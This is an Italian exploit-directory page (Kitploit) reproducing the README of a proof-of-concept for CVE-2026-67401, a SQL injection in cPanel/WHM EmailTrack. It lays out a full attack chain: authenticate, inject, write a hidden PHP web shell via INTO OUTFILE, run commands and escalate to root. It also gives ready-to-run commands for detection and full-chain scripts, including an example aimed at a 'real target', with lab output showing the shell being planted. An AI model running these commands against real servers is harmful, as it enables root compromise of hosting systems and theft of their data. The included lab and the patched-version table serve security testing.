Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-67401 — Proof-of-concept per CVE-2026-67401, un'iniezione SQL in EmailTrack di cPanel/WHM che consente la scrittura arbitraria di file e RCE come root, con sonde di rilevamento SQLi e un laboratorio vulnerabile autonomo. | Kitploit
Strumenti/GitHubGitHub/imbas007/cve-2026-67401
Scanner di VulnerabilitàAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubimbas007/cve-2026-67401

CVE-2026-67401

Proof-of-concept per CVE-2026-67401, un'iniezione SQL in EmailTrack di cPanel/WHM che consente la scrittura arbitraria di file e RCE come root, con sonde di rilevamento SQLi e un laboratorio vulnerabile autonomo.

3h 58m faNon ancora revisionato
Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-67401 — SQL Injection in EmailTrack di cPanel/WHM → RCE come root

CVE Severity Platform Python

Proof-of-concept per CVE-2026-67401, una vulnerabilità critica di SQL injection nella funzionalità EmailTrack di cPanel & WHM che consente a un utente autenticato con privilegi relativi alla posta di scrivere file arbitrari ed eseguire codice come root.

Scoperta da: Ali Mustafa Divulgata: 8 settembre 2026 Componente: EmailTrack (registrazione / tracciamento della consegna delle email)


Versioni interessate

Le versioni precedenti alle build corrette sono vulnerabili.

Serie di build cPanelVersione corretta
11.11011.110.0.143
11.13411.134.0.55
11.13611.136.0.39
11.13811.138.0.4
WP2 (11.138)11.138.1.9

Verifica la tua versione con:

root@kitploit:~
cat /usr/local/cpanel/version

Catena di exploit

root@kitploit:~
┌─────────────┐      ┌────────────┐      ┌─────────┐      ┌──────────┐
│ Auth as     │ ───► │ SQLi in    │ ───► │ INTO    │ ───► │ RCE as   │
│ cPanel user │      │ EmailTrack │      │ OUTFILE │      │ root     │
│ (mail priv) │      │ API call   │      │ (shell) │      │          │
└─────────────┘      └────────────┘      └─────────┘      └──────────┘
  1. Autenticarsi a cPanel con un account che possiede privilegi di posta.
  2. Iniettare tramite il parametro account di EmailTrack.
  3. Scrivere una web shell PHP con SELECT ... INTO OUTFILE in public_html/.
  4. Eseguire comandi attraverso la shell.
  5. Scalare i privilegi tramite binari SUID di cPanel, cron o task queue.

Contenuto del repository

FileDescrizione
poc_sqli.pyRilevamento SQL injection: boolean-based, time-based e conteggio colonne UNION
poc_full_chain.pyCatena di exploit completa: SQLi → web shell INTO OUTFILE → RCE → guida per root
lab/vuln_server.pySimulazione locale del backend EmailTrack vulnerabile (sicura, autonoma)
README.mdQuesto documento

Il lab incluso permette di eseguire e validare l'intera catena senza un vero server cPanel.


Requisiti

  • Python 3.8+
  • Nessun pacchetto di terze parti — tutto utilizza la libreria standard.

Utilizzo

Tutti i comandi vengono eseguiti dalla root del repository.

1. Avviare il lab locale

root@kitploit:~
python3 lab/vuln_server.py 18123 lab/htdocs
  • Credenziali: alice / s3cr1t
  • Emula: login UAPI, la query EmailTrack vulnerabile, SLEEP(), INTO OUTFILE e l'esecuzione della web shell PHP.
  • Argomento 1: porta (predefinita 18123)
  • Argomento 2: document root (predefinita lab/htdocs)

Lascialo in esecuzione in un terminale e usa un secondo terminale per i PoC.

2. Rilevamento SQL injection

root@kitploit:~
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode detect
ArgomentoDescrizione
-H, --hostHost cPanel, ad es. https://cp.example.com:2083
-u, --usernameAccount cPanel con privilegi di posta
-p, --passwordPassword dell'account
--paramParametro iniettabile (predefinito: account)
--modedetect (predefinito), boolean, timing, union o all
--sleepDurata di SLEEP() per la sonda timing (predefinita: 3.0)
--dump-versionTenta di estrarre la versione del DBMS tramite UNION
--insecureSalta la verifica del certificato TLS

Esegui una sonda specifica:

root@kitploit:~
# UNION column count only
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode union

# Time-based only, 5-second delay
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode timing --sleep 5

3. Catena di exploit completa

root@kitploit:~
CPANEL_USER=alice CPANEL_PASS='s3cr1t' \
  python3 poc_full_chain.py http://127.0.0.1:18123 \
  --shell-base http://127.0.0.1:18123
Argomento / EnvDescrizione
host (posizionale)Host cPanel, oppure imposta la variabile CPANEL_HOST
CPANEL_USERAccount cPanel con privilegi di posta
CPANEL_PASSPassword dell'account
--shell-baseURL di base che serve public_html (dove viene raggiunta la web shell)
--insecureSalta la verifica del certificato TLS
--no-escalateFermati dopo l'RCE; salta la guida per l'escalation a root
SHELL_NAME (env)Nome file della web shell (predefinito: .mail.cache.php)

Fasi eseguite automaticamente:

  1. Autenticazione a cPanel
  2. Conferma della SQL injection (boolean + time-based)
  3. Determinazione del numero di colonne della query tramite UNION
  4. Scrittura di una web shell PHP con SELECT ... INTO OUTFILE
  5. Esecuzione di comandi attraverso la shell (id, whoami, enumerazione SUID, …)
  6. Stampa della guida per l'escalation a root (SUID whmapi1, cron, task queue)

4. Contro un target reale

root@kitploit:~
# Detection
python3 poc_sqli.py -H https://cp.example.com:2083 -u user -p 'pass' \
  --insecure --mode detect

# Full chain (--shell-base is the account's web host, not the cPanel port)
CPANEL_USER=user CPANEL_PASS='pass' \
  python3 poc_full_chain.py https://cp.example.com:2083 \
  --shell-base https://cp.example.com --insecure

Nota: il valore predefinito di --shell-base rimuove dall'host la porta riservata a cPanel (2082/2083). Se il document root è servito su una porta diversa, impostala esplicitamente.


Risultati verificati

Output prodotto contro il lab incluso:

root@kitploit:~
  CVE-2026-67401  cPanel/WHM EmailTrack SQLi -> File Write -> RCE
  version 1.0

  target: http://127.0.0.1:18123
  user:   alice
  [+] authenticated
  [1] confirming SQL injection in EmailTrack `account`
  [+] boolean-based SQLi CONFIRMED
  [+] time-based SQLi CONFIRMED (SLEEP(2) -> 6.0s)
  [2] determining column count via UNION
  [+] target query has 5 columns
  [3] writing PHP web shell via SELECT ... INTO OUTFILE
  [+] shell written -> /home/alice/public_html/.mail.cache.php
  [4] executing commands through the web shell
  [+] id -> uid=1000(x) gid=1000(x) ...

Riferimenti

  • Critical cPanel SQL Injection Lets Attackers Grab Root Access — The Daily Tech Feed
  • cPanel Security Advisory: CVE-2026-67401
  • CWE-89: Improper Neutralization of Special Elements used in an SQL Command

Licenza

Rilasciato per scopi educativi e di ricerca sulla sicurezza autorizzata. Consulta il Disclaimer prima dell'uso.

Scarica lo strumento